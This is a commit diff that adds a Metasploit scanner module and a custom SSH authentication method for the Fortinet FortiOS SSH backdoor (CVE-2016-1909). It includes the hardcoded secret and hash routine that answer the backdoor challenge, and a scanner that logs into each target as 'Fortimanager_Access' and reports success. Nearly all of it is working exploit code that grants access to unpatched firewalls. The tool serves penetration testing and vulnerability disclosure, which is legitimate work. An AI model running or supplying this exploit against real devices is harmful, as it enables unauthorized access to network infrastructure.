Land #6612, Add aux module for Fortinet backdoor

2016-02-29 12:02:49 -06:00 · 2016-02-29 12:02:49 -06:00 · 2950996cb8
parent 53ff3051e1 53d703355f
commit 2950996cb8
2 changed files with 172 additions and 0 deletions
--- a/lib/msf/core/exploit/fortinet.rb
+++ b/lib/msf/core/exploit/fortinet.rb
@ -0,0 +1,97 @@
+# -*- coding: binary -*-
+
+# https://www.ietf.org/rfc/rfc4256.txt
+
+require 'net/ssh'
+
+class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract
+
+  USERAUTH_INFO_REQUEST  = 60
+  USERAUTH_INFO_RESPONSE = 61
+
+  def authenticate(service_name, username, password = nil)
+    debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
+
+    send_message(userauth_request(
+=begin
+      string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
+      string    service name (US-ASCII)
+      string    "keyboard-interactive" (US-ASCII)
+      string    language tag (as defined in [RFC-3066])
+      string    submethods (ISO-10646 UTF-8)
+=end
+      username,
+      service_name,
+      'keyboard-interactive',
+      '',
+      ''
+    ))
+
+    loop do
+      message = session.next_message
+
+      case message.type
+      when USERAUTH_SUCCESS
+        debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
+        return true
+      when USERAUTH_FAILURE
+        debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
+        return false
+      when USERAUTH_INFO_REQUEST
+        debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
+
+=begin
+        string    name (ISO-10646 UTF-8)
+        string    instruction (ISO-10646 UTF-8)
+        string    language tag (as defined in [RFC-3066])
+        int       num-prompts
+        string    prompt[1] (ISO-10646 UTF-8)
+        boolean   echo[1]
+        ...
+        string    prompt[num-prompts] (ISO-10646 UTF-8)
+        boolean   echo[num-prompts]
+=end
+        name        = message.read_string
+        instruction = message.read_string
+        _           = message.read_string
+
+        prompts = []
+
+        message.read_long.times do
+          prompt   = message.read_string
+          echo     = message.read_bool
+          prompts << [prompt, echo]
+        end
+
+        debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }
+
+        send_message(Net::SSH::Buffer.from(
+=begin
+          byte      SSH_MSG_USERAUTH_INFO_RESPONSE
+          int       num-responses
+          string    response[1] (ISO-10646 UTF-8)
+          ...
+          string    response[num-responses] (ISO-10646 UTF-8)
+=end
+          :byte,   USERAUTH_INFO_RESPONSE,
+          :long,   1,
+          :string, custom_handler(name, instruction, prompts)
+        ))
+      else
+        raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
+      end
+    end
+  end
+
+  # http://seclists.org/fulldisclosure/2016/Jan/26
+  def custom_handler(title, instructions, prompt_list)
+    n = prompt_list[0][0]
+    m = Digest::SHA1.new
+    m.update("\x00" * 12)
+    m.update(n + 'FGTAbc11*xy+Qqz27')
+    m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
+    h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
+    [h]
+  end
+
+end
--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/fortinet'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Fortinet SSH Backdoor Scanner',
+      'Description'    => %q{
+        This module scans for the Fortinet SSH backdoor.
+      },
+      'Author'         => [
+        'operator8203 <operator8203[at]runbox.com>', # PoC
+        'wvu'                                        # Module
+      ],
+      'References'     => [
+        ['CVE', '2016-1909'],
+        ['EDB', '39224'],
+        ['PACKETSTORM', '135225'],
+        ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
+        ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
+      ],
+      'DisclosureDate' => 'Jan 09 2016',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(22)
+    ])
+
+    register_advanced_options([
+      OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
+      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
+    ])
+  end
+
+  def run_host(ip)
+    begin
+      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(
+          ip,
+          'Fortimanager_Access',
+          port: datastore['RPORT'],
+          auth_methods: ['fortinet-backdoor'],
+          verbose: datastore['SSH_DEBUG'] ? :debug : nil
+        )
+      end
+    rescue Net::SSH::Exception => e
+      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
+      return
+    end
+
+    if ssh
+      print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
+      report_vuln(
+        :host => ip,
+        :name => self.name,
+        :refs => self.references,
+        :info => ssh.transport.server_version.version
+      )
+    end
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+end